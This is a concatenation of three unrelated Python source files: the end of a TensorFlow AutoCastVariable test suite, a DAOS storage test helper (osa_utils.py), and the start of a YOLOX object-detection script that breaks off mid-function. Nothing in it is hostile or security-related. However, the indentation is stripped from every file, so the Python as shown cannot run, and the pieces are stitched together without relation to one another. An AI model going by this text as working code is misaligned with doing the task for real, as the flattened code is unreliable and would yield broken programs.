if not tf.executing_eagerly():
if not tf.distribute.has_strategy():
# These functions are not supported for DistributedVariables
x.load(9)
self.assertEqual(x.eval(), 9)
self.assertEqual(self.evaluate(x.initial_value), 7)
self.assertEqual(x.op, x._variable.op)
self.assertEqual(x.graph, x._variable.graph)
if not tf.distribute.has_strategy():
# These attributes are not supported for DistributedVariables
self.assertIsNone(x.constraint)
self.assertEqual(x.initializer, x._variable.initializer)
self.assertEqual(evaluate(x.assign(8)), 8)
self.assertEqual(evaluate(x.assign_add(2)), 10)
self.assertEqual(evaluate(x.assign_sub(3)), 7)
self.assertEqual(x.name, x._variable.name)
self.assertEqual(x.device, x._variable.device)
self.assertEqual(x.shape, ())
self.assertEqual(x.get_shape(), ())
if not tf.distribute.has_strategy():
# Test scatter_* methods. These are not supported for
# DistributedVariables
x = get_var([7, 8], tf.float32)
x = autocast_variable.create_autocast_variable(x)
with autocast_variable.enable_auto_cast_variables(read_dtype):
self.evaluate(x.initializer)
self.assertAllEqual(self.evaluate(x.value()), [7, 8])
def slices(val, index):
return tf.IndexedSlices(
values=tf.constant(val, dtype=tf.float32),
indices=tf.constant(index, dtype=tf.int32),
dense_shape=tf.constant([2], dtype=tf.int32))
self.assertAllEqual(evaluate(x.scatter_sub(slices(1., 0))), [6, 8])
self.assertAllEqual(evaluate(x.scatter_add(slices(1., 0))), [7, 8])
self.assertAllEqual(evaluate(x.scatter_max(slices(9., 1))), [7, 9])
self.assertAllEqual(evaluate(x.scatter_min(slices(8., 1))), [7, 8])
self.assertAllEqual(evaluate(x.scatter_mul(slices(2., 1))), [7, 16])
self.assertAllEqual(evaluate(x.scatter_div(slices(2., 1))), [7, 8])
self.assertAllEqual(
evaluate(x.scatter_update(slices(4., 1))), [7, 4])
self.assertAllEqual(
evaluate(x.scatter_nd_sub([[0], [1]], [1., 2.])), [6, 2])
self.assertAllEqual(
evaluate(x.scatter_nd_add([[0], [1]], [1., 2.])), [7, 4])
self.assertAllEqual(
evaluate(x.scatter_nd_update([[0], [1]], [1., 2.])), [1, 2])
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_operator_overloads(self, distribution):
with distribution.scope():
for read_dtype in (tf.float32, tf.float16):
x = get_var(7., tf.float32)
x = autocast_variable.create_autocast_variable(x)
with autocast_variable.enable_auto_cast_variables(read_dtype):
self.evaluate(x.initializer)
self.assertAlmostEqual(8, self.evaluate(x + 1))
self.assertAlmostEqual(10, self.evaluate(3 + x))
self.assertAlmostEqual(14, self.evaluate(x + x))
self.assertAlmostEqual(5, self.evaluate(x - 2))
self.assertAlmostEqual(6, self.evaluate(13 - x))
self.assertAlmostEqual(0, self.evaluate(x - x))
self.assertAlmostEqual(14, self.evaluate(x * 2))
self.assertAlmostEqual(21, self.evaluate(3 * x))
self.assertAlmostEqual(49, self.evaluate(x * x))
self.assertAlmostEqual(3.5, self.evaluate(x / 2))
self.assertAlmostEqual(1.5, self.evaluate(10.5 / x))
self.assertAlmostEqual(3, self.evaluate(x // 2))
self.assertAlmostEqual(2, self.evaluate(15 // x))
if read_dtype == tf.float32:
# The "mod" operator does not support float16
self.assertAlmostEqual(1, self.evaluate(x % 2))
self.assertAlmostEqual(2, self.evaluate(16 % x))
self.assertTrue(self.evaluate(x < 12))
self.assertTrue(self.evaluate(x <= 12))
self.assertFalse(self.evaluate(x > 12))
self.assertFalse(self.evaluate(x >= 12))
self.assertFalse(self.evaluate(12 < x))
self.assertFalse(self.evaluate(12 <= x))
self.assertTrue(self.evaluate(12 > x))
self.assertTrue(self.evaluate(12 >= x))
self.assertAlmostEqual(343, self.evaluate(pow(x, 3)), places=4)
self.assertAlmostEqual(128, self.evaluate(pow(2, x)), places=4)
self.assertAlmostEqual(-7, self.evaluate(-x))
self.assertAlmostEqual(7, self.evaluate(abs(x)))
x = get_var([7, 8, 9], tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
self.assertEqual(self.evaluate(x[1]), 8)
if tf.__internal__.tf2.enabled() and tf.executing_eagerly():
self.assertAllEqual(x == [7., 8., 10.], [True, True, False])
self.assertAllEqual(x != [7., 8., 10.], [False, False, True])
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign(self, distribution):
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
# outside of auto cast scope.
v1 = tf.constant(3., dtype=tf.float32)
v2 = tf.constant(3., dtype=tf.float16)
def run_and_check():
# Assign float32 values
self.assertAllClose(3., self.evaluate(x.assign(v1)))
self.assertAllClose(3. * 2, self.evaluate(x.assign_add(v1)))
self.assertAllClose(3., self.evaluate(x.assign_sub(v1)))
# Attempt to assign float16 values
with self.assertRaisesRegex(
ValueError,
'conversion requested dtype float32 for Tensor with dtype float16'):
self.evaluate(x.assign(v2))
with self.assertRaisesRegex(
ValueError,
'conversion requested dtype float32 for Tensor with dtype float16'):
self.evaluate(x.assign_add(v2))
with self.assertRaisesRegex(
ValueError,
'conversion requested dtype float32 for Tensor with dtype float16'):
self.evaluate(x.assign_sub(v2))
# Assign Python floats
self.assertAllClose(0., self.evaluate(x.assign(0.)))
self.assertAllClose(3., self.evaluate(x.assign(3.)))
self.assertAllClose(3. * 2, self.evaluate(x.assign_add(3.)))
self.assertAllClose(3., self.evaluate(x.assign_sub(3.)))
# Assign multiple times
# This currently doesn't work in graph mode if a strategy is used
if not tf.distribute.has_strategy() or tf.executing_eagerly():
assign = x.assign(1.)
self.assertAllClose(1., self.evaluate(assign))
self.assertAllClose(0., self.evaluate(assign.assign(0.)))
assign_add = x.assign_add(3.)
self.assertAllClose(3., self.evaluate(assign_add))
self.assertAllClose(3. * 3,
self.evaluate(x.assign_add(3.).assign_add(3.)))
self.assertAllClose(3. * 3, x)
assign_sub = x.assign_sub(3.)
self.assertAllClose(3. * 2, self.evaluate(assign_sub))
self.assertAllClose(0.,
self.evaluate(x.assign_sub(3.).assign_sub(3.)))
# Assign with read_value=False
self.assertIsNone(self.evaluate(x.assign(1., read_value=False)))
self.assertAllClose(1., self.evaluate(x))
self.assertIsNone(self.evaluate(x.assign_add(2., read_value=False)))
self.assertAllClose(3., self.evaluate(x))
self.assertIsNone(self.evaluate(x.assign_sub(3., read_value=False)))
self.assertAllClose(0., self.evaluate(x))
# Use the tf.assign functions instead of the var.assign methods.
self.assertAllClose(0., self.evaluate(tf.compat.v1.assign(x, 0.)))
self.assertAllClose(3., self.evaluate(tf.compat.v1.assign(x, 3.)))
self.assertAllClose(3. * 2,
self.evaluate(tf.compat.v1.assign_add(x, 3.)))
self.assertAllClose(3., self.evaluate(tf.compat.v1.assign_sub(x, 3.)))
run_and_check()
# reset x
self.evaluate(x.assign(0.))
# within auto cast scope.
with autocast_variable.enable_auto_cast_variables(tf.float16):
# assign still expect float32 value even if in float16 scope
run_and_check()
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign_tf_function(self, distribution):
if not tf.executing_eagerly():
self.skipTest('Test is not compatible with graph mode')
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
@tf.function
def run_assign():
return x.assign(1.).assign_add(3.).assign_add(3.).assign_sub(2.)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertAllClose(5., self.evaluate(run_assign()))
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign_op(self, distribution):
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
@tf.function
def func():
self.assertIsNotNone(x.assign(1.0).op)
self.assertIsNotNone(x.assign_add(1.0).op)
self.assertIsNotNone(x.assign_sub(1.0).op)
func()
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_tf_function_control_dependencies(self, distribution):
if not tf.executing_eagerly():
self.skipTest('Test is not compatible with graph mode')
with distribution.scope():
x = get_var(0., tf.float32)
x = autocast_variable.create_autocast_variable(x)
@tf.function
def func():
update = x.assign_add(1.)
with tf.control_dependencies([update]):
x.assign_add(1.)
func()
self.assertAllClose(2., self.evaluate(x))
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_assign_stays_in_true_dtype(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
# small_val is a value such that 1.0 + small_val == 1.0 in fp16, but not
# in fp32
small_val = np.finfo('float16').eps / 2
small_tensor = tf.constant(small_val, dtype=tf.float32)
with autocast_variable.enable_auto_cast_variables(tf.float16):
# Variable should be increased, despite it appearing to be the same
# float16 value.
self.evaluate(x.assign(1. + small_tensor))
self.assertEqual(1., self.evaluate(x.value()))
self.assertEqual(1. + small_val, self.evaluate(x))
self.evaluate(x.assign(1.))
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.evaluate(x.assign_add(small_tensor))
self.assertEqual(1., self.evaluate(x.value()))
self.assertEqual(1. + small_val, self.evaluate(x))
def test_thread_local_autocast_dtype(self):
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(tf.identity(x).dtype, tf.float16)
# New threads should not see the modified value of the autocast dtype.
var_dtype = None
def f():
nonlocal var_dtype
var_dtype = x._cast_dtype
thread = threading.Thread(target=f)
thread.start()
thread.join()
self.assertEqual(var_dtype, tf.float32)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_checkpoint(self, distribution):
with self.test_session():
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
self.evaluate(x.assign(123.))
checkpoint = tf.train.Checkpoint(x=x)
prefix = os.path.join(self.get_temp_dir(), 'ckpt')
save_path = checkpoint.save(prefix)
self.evaluate(x.assign(234.))
checkpoint.restore(save_path).assert_consumed().run_restore_ops()
self.assertEqual(self.evaluate(x), 123.)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_invalid_wrapped_variable(self, distribution):
with distribution.scope():
# Wrap a non-variable
with self.assertRaisesRegex(ValueError, 'variable must be of type'):
x = tf.constant([1.], dtype=tf.float32)
autocast_variable.create_autocast_variable(x)
# Wrap a non-floating point variable
with self.assertRaisesRegex(ValueError,
'variable must be a floating point'):
x = get_var(1, tf.int32)
autocast_variable.create_autocast_variable(x)
def test_repr(self):
# We do not test with DistributionStrategy because we do not want to rely on
# the exact __repr__ output of a DistributedVariable.
x = get_var(1., tf.float32, name='x')
x = autocast_variable.create_autocast_variable(x)
if tf.executing_eagerly():
self.assertStartsWith(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float32, numpy="
)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertStartsWith(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float16, numpy="
)
else:
self.assertEqual(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float32>"
)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(
repr(x),
"<AutoCastVariable 'x:0' shape=() dtype=float32 "
"dtype_to_cast_to=float16>"
)
def test_repr_distributed(self):
strategy = tf.distribute.MirroredStrategy(['/cpu:1', '/cpu:2'])
with strategy.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
use_policy = getattr(strategy.extended, '_use_var_policy', False)
if use_policy:
self.assertRegex(
repr(x).replace('\n', ' '),
'<AutoCastDistributedVariable dtype=float32 '
'dtype_to_cast_to=float32 '
'inner_variable=DistributedVariable.*>')
else:
self.assertRegex(
repr(x).replace('\n', ' '),
'<AutoCastDistributedVariable dtype=float32 '
'dtype_to_cast_to=float32 '
'inner_variable=MirroredVariable.*>')
@parameterized.named_parameters(
('v1', tf.compat.v1.train.GradientDescentOptimizer),
('v2', gradient_descent_v2.SGD))
def test_optimizer(self, optimizer_class):
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
opt = optimizer_class(1.)
@tf.function
def f():
opt.minimize(lambda: x + 1., var_list=[x])
if tf.executing_eagerly():
f()
else:
op = f() # pylint: disable=assignment-from-no-return
self.evaluate(tf.compat.v1.global_variables_initializer())
self.evaluate(op)
self.assertEqual(self.evaluate(x), 0)
if __name__ == '__main__':
tf.test.main()
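# Context sketch (not part of the test suite): in typical Keras usage these
# AutoCastVariables are created implicitly once a mixed-precision policy is active,
# e.g.
#
#   tf.keras.mixed_precision.set_global_policy('mixed_float16')
#   layer = tf.keras.layers.Dense(4)
#   y = layer(tf.ones((1, 4)))
#   print(layer.kernel.dtype, layer.kernel.true_dtype, y.dtype)
#   # roughly: float32, float32, float16 (weights stay float32, compute runs in float16)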
|
osa_utils.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from command_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
DaosObj, DaosApiError)
from general_utils import create_string_buffer
class OSAUtils(MdtestBase, IorTestBase):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server offline drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.pool_cont_dict = {}
self.container = None
self.obj = None
self.ioreq = None
self.dmg_command = self.get_dmg_command()
self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
default=[0])[0]
self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
default=[0])[0]
self.record_length = self.params.get("length", '/run/record/*',
default=[0])[0]
self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*',
default="")
self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*')
self.out_queue = queue.Queue()
self.dmg_command.exit_status_exception = False
self.test_during_aggregation = False
self.test_during_rebuild = False
self.test_with_checksum = True
@fail_on(CommandFailure)
def get_pool_leader(self):
"""Get the pool leader.
Returns:
int: pool leader value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["leader"])
@fail_on(CommandFailure)
def get_rebuild_status(self):
"""Get the rebuild status.
Returns:
str: rebuild status
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["status"]
@fail_on(CommandFailure)
def get_rebuild_state(self):
"""Get the rebuild state.
Returns:
str: rebuild state
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["state"]
@fail_on(CommandFailure)
def is_rebuild_done(self, time_interval,
wait_for_rebuild_to_complete=False):
"""Rebuild is completed/done.
Args:
time_interval: Wait interval between checks
wait_for_rebuild_to_complete: Rebuild completed
(Default: False)
"""
self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
interval=time_interval)
@fail_on(CommandFailure)
def assert_on_rebuild_failure(self):
"""If the rebuild is not successful,
raise assert.
"""
rebuild_status = self.get_rebuild_status()
self.log.info("Rebuild Status: %s", rebuild_status)
rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
self.assertTrue(rebuild_status not in rebuild_failed_string,
"Rebuild failed")
@fail_on(CommandFailure)
def print_and_assert_on_rebuild_failure(self, out, timeout=3):
"""Print the out value (daos, dmg, etc) and check for rebuild
completion. If not, raise assert.
"""
self.log.info(out)
self.is_rebuild_done(timeout)
self.assert_on_rebuild_failure()
@fail_on(CommandFailure)
def get_pool_version(self):
"""Get the pool version.
Returns:
int: pool_version_value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["version"])
def set_container(self, container):
"""Set the OSA utils container object.
Args:
container (obj) : Container object to be used
within OSA utils.
"""
self.container = container
def simple_exclude_reintegrate_loop(self, rank, loop_time=100):
"""Perform exclude and reintegration on a rank repeatedly
for a certain amount of time (loop_time, in seconds).
"""
start_time = time.time()
finish_time = start_time
while int(finish_time - start_time) < loop_time:
output = self.dmg_command.pool_exclude(self.pool.uuid, rank)
self.print_and_assert_on_rebuild_failure(output)
output = self.dmg_command.pool_reintegrate(self.pool.uuid, rank)
self.print_and_assert_on_rebuild_failure(output)
finish_time = time.time()
@fail_on(DaosApiError)
def write_single_object(self):
"""Write some data to the existing pool."""
self.pool.connect(2)
csum = self.params.get("enable_checksum", '/run/container/*')
self.container = DaosContainer(self.context)
input_param = self.container.cont_input_values
input_param.enable_chksum = csum
self.container.create(poh=self.pool.pool.handle,
con_prop=input_param)
self.container.open()
self.obj = DaosObj(self.context, self.container)
self.obj.create(objcls=1)
self.obj.open()
self.ioreq = IORequest(self.context,
self.container,
self.obj, objtype=4)
self.log.info("Writing the Single Dataset")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0])
* self.record_length)
d_key_value = "dkey {0}".format(dkey)
c_dkey = create_string_buffer(d_key_value)
a_key_value = "akey {0}".format(akey)
c_akey = create_string_buffer(a_key_value)
c_value = create_string_buffer(indata)
c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size)
self.obj.close()
self.container.close()
@fail_on(DaosApiError)
def verify_single_object(self):
"""Verify the container data on the existing pool."""
self.pool.connect(2)
self.container.open()
self.obj.open()
self.log.info("Single Dataset Verification -- Started")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0]) *
self.record_length)
c_dkey = create_string_buffer("dkey {0}".format(dkey))
c_akey = create_string_buffer("akey {0}".format(akey))
val = self.ioreq.single_fetch(c_dkey,
c_akey,
len(indata)+1)
if indata != (repr(val.value)[1:-1]):
self.d_log.error("ERROR:Data mismatch for "
"dkey = {0}, "
"akey = {1}".format(
"dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}"
.format("dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.obj.close()
self.container.close()
def prepare_cont_ior_write_read(self, oclass, flags):
"""This method prepares the containers for
IOR write and read invocations.
To enable aggregation:
- Create two containers and read always from
first container
Normal usage (use only a single container):
- Create a single container and use the same.
Args:
oclass (str): IOR object class
flags (str): IOR flags
"""
self.log.info(self.pool_cont_dict)
# If pool is not in the dictionary,
# initialize its container list to None
# e.g. {poolA: [None, None, None, None]}
if self.pool not in self.pool_cont_dict:
self.pool_cont_dict[self.pool] = [None] * 4
# Create container if the pool doesn't have one.
# Otherwise, use the existing container in the pool.
# pool_cont_dict {poolA: [containerA, "Updated", containerB, "Updated"],
#                 poolB: [containerA, "Updated", containerB, None]}
if self.pool_cont_dict[self.pool][0] is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][0] = self.container
self.pool_cont_dict[self.pool][1] = "Updated"
else:
if ((self.test_during_aggregation is True) and
(self.pool_cont_dict[self.pool][1] == "Updated") and
(self.pool_cont_dict[self.pool][3] is None) and
("-w" in flags)):
# Write to the second container
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][2] = self.container
self.pool_cont_dict[self.pool][3] = "Updated"
else:
self.container = self.pool_cont_dict[self.pool][0]
def delete_extra_container(self, pool):
"""Delete the extra container in the pool.
Refer prepare_cont_ior_write_read. This method
should be called when OSA tests intend to
enable aggregation.
Args:
pool (object): pool handle
"""
self.pool.set_property("reclaim", "time")
extra_container = self.pool_cont_dict[pool][2]
extra_container.destroy()
self.pool_cont_dict[pool][3] = None
def get_object_replica_value(self, oclass):
""" Get the object replica value for an object class.
Args:
oclass (str): Object Class (eg: RP_2G1,etc)
Returns:
value (int) : Object replica value
"""
value = 0
if "_" in oclass:
replica_list = oclass.split("_")
value = replica_list[1][0]
else:
self.log.info("Wrong Object Class. Cannot split")
return int(value)
def update_cont_properties(self, cont_prop):
"""Update the existing container properties.
Args:
cont_prop (str): Replace existing container properties
with new value
"""
self.container.properties.value = cont_prop
def set_cont_class_properties(self, oclass="S1"):
"""Update the container class to match the IOR object
class. Fix the rf factor based on object replica value.
Also, remove the redundancy factor for S type
object class.
Args:
oclass (str, optional): Container object class to be set.
Defaults to "S1".
"""
self.container.oclass.value = oclass
# Set the container properties properly for S1, S2 class.
# rf should not be set to 1 for S type object class.
x = re.search("^S\\d$", oclass)
prop = self.container.properties.value
if x is not None:
prop = prop.replace("rf:1", "rf:0")
else:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
prop = prop.replace("rf:1", rf_value)
self.container.properties.value = prop
def assert_on_exception(self, out_queue=None):
"""Assert on exception while executing an application.
Args:
out_queue (queue): Check whether the queue is
empty. If empty, app (ior, mdtest) didn't encounter error.
"""
if out_queue is None:
out_queue = self.out_queue
if out_queue.empty():
pass
else:
exc = out_queue.get(block=False)
out_queue.put(exc)
raise exc
def cleanup_queue(self, out_queue=None):
"""Cleanup the existing thread queue.
Args:
out_queue (queue): Queue to cleanup.
"""
if out_queue is None:
out_queue = self.out_queue
while not out_queue.empty():
out_queue.get(block=True)
def run_ior_thread(self, action, oclass, test,
single_cont_read=True,
fail_on_warning=True):
"""Start the IOR thread for either writing or
reading data to/from a container.
Args:
action (str): Start the IOR thread with Read or
Write
oclass (str): IOR object class
test (list): IOR test sequence
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
if action == "Write":
flags = self.ior_w_flags
else:
flags = self.ior_r_flags
# Add a thread for these IOR arguments
process = threading.Thread(target=self.ior_thread,
kwargs={"pool": self.pool,
"oclass": oclass,
"test": test,
"flags": flags,
"single_cont_read":
single_cont_read,
"fail_on_warning":
fail_on_warning})
# Launch the IOR thread
process.start()
# Wait for the thread to finish
try:
process.join()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
def ior_thread(self, pool, oclass, test, flags,
single_cont_read=True,
fail_on_warning=True):
"""Start an IOR thread.
Args:
pool (object): pool handle
oclass (str): IOR object class, container class.
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
self.pool = pool
self.ior_cmd.get_params(self)
self.ior_cmd.set_daos_params(self.server_group, self.pool)
self.ior_cmd.dfs_oclass.update(oclass)
self.ior_cmd.dfs_dir_oclass.update(oclass)
if single_cont_read is True:
# Prepare the containers created and use in a specific
# way defined in prepare_cont_ior_write.
self.prepare_cont_ior_write_read(oclass, flags)
elif single_cont_read is False and self.container is not None:
# Here self.container is having actual value. Just use it.
self.log.info(self.container)
else:
self.fail("Not supported option on ior_thread")
try:
job_manager = self.get_ior_job_manager_command()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
job_manager.job.dfs_cont.update(self.container.uuid)
self.ior_cmd.transfer_size.update(test[2])
self.ior_cmd.block_size.update(test[3])
self.ior_cmd.flags.update(flags)
try:
self.run_ior_with_pool(create_pool=False, create_cont=False,
fail_on_warning=fail_on_warning)
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
def run_mdtest_thread(self):
"""Start mdtest thread and wait until thread completes.
"""
# Create container only
self.mdtest_cmd.dfs_destroy = False
if self.container is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(self.mdtest_cmd.dfs_oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(self.mdtest_cmd.dfs_oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
job_manager = self.get_mdtest_job_manager_command(self.manager)
job_manager.job.dfs_cont.update(self.container.uuid)
# Add a thread for these IOR arguments
process = threading.Thread(target=self.execute_mdtest)
# Launch the MDtest thread
process.start()
# Wait for the thread to finish
try:
process.join()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
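# Illustrative usage sketch (hypothetical test method; real OSA test cases live in
# separate files, and the object class / IOR test-sequence values below are assumptions):
#
#   class OSAOfflineDrainExample(OSAUtils):
#       def test_exclude_reintegrate_with_ior(self):
#           self.run_ior_thread("Write", oclass="RP_2G1", test=[1, 1, "4k", "32M"])
#           output = self.dmg_command.pool_exclude(self.pool.uuid, "1")
#           self.print_and_assert_on_rebuild_failure(output)
#           output = self.dmg_command.pool_reintegrate(self.pool.uuid, "1")
#           self.print_and_assert_on_rebuild_failure(output)
#           self.run_ior_thread("Read", oclass="RP_2G1", test=[1, 1, "4k", "32M"])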
|
detect.py
|
"""
author: LSH9832
reference: https://github.com/Megvii-BaseDetection/YOLOX
"""
import os
import cv2
import torch
import sys
import argparse
import yaml
this_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(this_path) if this_path not in sys.path else None  # make sure this project dir is importable
import yolox.exp
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import fuse_model, postprocess, vis
def make_parser():
parser = argparse.ArgumentParser("yolox detect parser")
parser.add_argument("-s", "--source", type=str or int, default=source, help="source")
parser.add_argument("-t", "--source-type", type=str, default=source_type, help="source type: cam, vid, image, image_dir")
parser.add_argument("-p", "--pause", default=bool(start_with_pause), action='store_true', help="start with pause")
parser.add_argument("-m", "--multi", default=False, action='store_true', help="run with multiprocess")
return parser
class Colors:
def __init__(self):
hex = ('FF3838', 'FF9D97', 'FF701F', 'FFB21D', 'CFD231', '48F90A', '92CC17', '3DDB86', '1A9334', '00D4BB',
'2C99A8', '00C2FF', '344593', '6473FF', '0018EC', '8438FF', '520085', 'CB38FF', 'FF95C8', 'FF37C7')
self.palette = [self.hex2rgb('#' + c) for c in hex]
self.n = len(self.palette)
def __call__(self, i, bgr=False):
c = self.palette[int(i) % self.n]
return (c[2], c[1], c[0]) if bgr else c
@staticmethod
def hex2rgb(h):
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
colors = Colors()
def plot_one_box(x, im, color=(128, 128, 128), label=None, line_thickness=3):
# Plots one bounding box on image 'im' using OpenCV
assert im.data.contiguous, 'Image not contiguous. Apply np.ascontiguousarray(im) to plot_on_box() input image.'
tl = line_thickness or round(0.002 * (im.shape[0] + im.shape[1]) / 2) + 1 # line/font thickness
c1, c2 = (int(x[0]), int((x[1]))), (int(x[2]), int((x[3])))
# print(c1,c2)
cv2.rectangle(im, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], (c1[1] - t_size[1] - 3) if (c1[1] - t_size[1] - 3) > 0 else (c1[1] + t_size[1] + 3)
cv2.rectangle(im, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(im, label, (c1[0], c1[1] - 2) if (c1[1] - t_size[1] - 3) > 0 else (c1[0], c2[1] - 2), 0, tl / 3,
[225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def draw_bb(img, pred, names, type_limit=None, line_thickness=2):
if type_limit is None:
type_limit = names
for *xyxy, conf0, conf1, cls in pred:
conf = conf0 * conf1
if names[int(cls)] in type_limit:
label = f'{names[int(cls)]} {conf:.2f}'
plot_one_box(xyxy, img, label=label, color=colors(int(cls), True), line_thickness=line_thickness)
class DirCapture(object):
"""read image file from a dir containing images or a image file"""
__cv2 = cv2
__support_type = ['jpg', 'jpeg', 'png', 'bmp']
__img_list = []
def __init__(self, path: str = None):
if path is not None:
self.open(path)
def open(self, path):
self.__img_list = []
if os.path.isdir(path):
path = path[:-1] if path.endswith('/') else path
assert os.path.isdir(path)
from glob import glob
for img_type in self.__support_type:
self.__img_list += sorted(glob('%s/*.%s' % (path, img_type)))
elif os.path.isfile(path) and '.' in path and path.split('.')[-1] in self.__support_type:
self.__img_list = [path]
else:
print('wrong input')
self.__img_list = []
def isOpened(self):
return bool(len(self.__img_list))
def read(self):
this_img_name = self.__img_list[0]
del self.__img_list[0]
img = self.__cv2.imread(this_img_name)
success = img.size > 0
return success, img
def release(self):
self.__img_list = []
class Predictor(object):
def __init__(
self,
model,
exp,
cls_names=COCO_CLASSES,  # class names
trt_file=None,  # TensorRT file
decoder=None,  # TensorRT decoder
device="cpu",
fp16=False,  # use mixed-precision (FP16) inference
legacy=False,  # compatibility with older preprocessing
):
self.model = model
self.cls_names = cls_names
self.decoder = decoder
self.num_classes = exp.num_classes
self.confthre = exp.test_conf
self.nmsthre = exp.nmsthre
self.test_size = exp.test_size
self.device = device
self.fp16 = fp16
self.preproc = ValTransform(legacy=legacy)
if trt_file is not None:
from torch2trt import TRTModule
model_trt = TRTModule()
model_trt.load_state_dict(torch.load(trt_file))
x = torch.ones(1, 3, exp.test_size[0], exp.test_size[1]).cuda()
self.model(x)
self.model = model_trt
def inference(self, img):
if isinstance(img, str):
img = cv2.imread(img)
ratio = min(self.test_size[0] / img.shape[0], self.test_size[1] / img.shape[1])
img, _ = self.preproc(img, None, self.test_size)
img = torch.from_numpy(img).unsqueeze(0)
img = img.float()
if self.device == "gpu":
img = img.cuda()
if self.fp16:
img = img.half() # to FP16
with torch.no_grad():
outputs = self.model(img)
if self.decoder is not None:
outputs = self.decoder(outputs, dtype=outputs.type())
outputs = postprocess(
outputs, self.num_classes, self.confthre,
self.nmsthre, class_agnostic=True
)
if outputs[0] is not None:
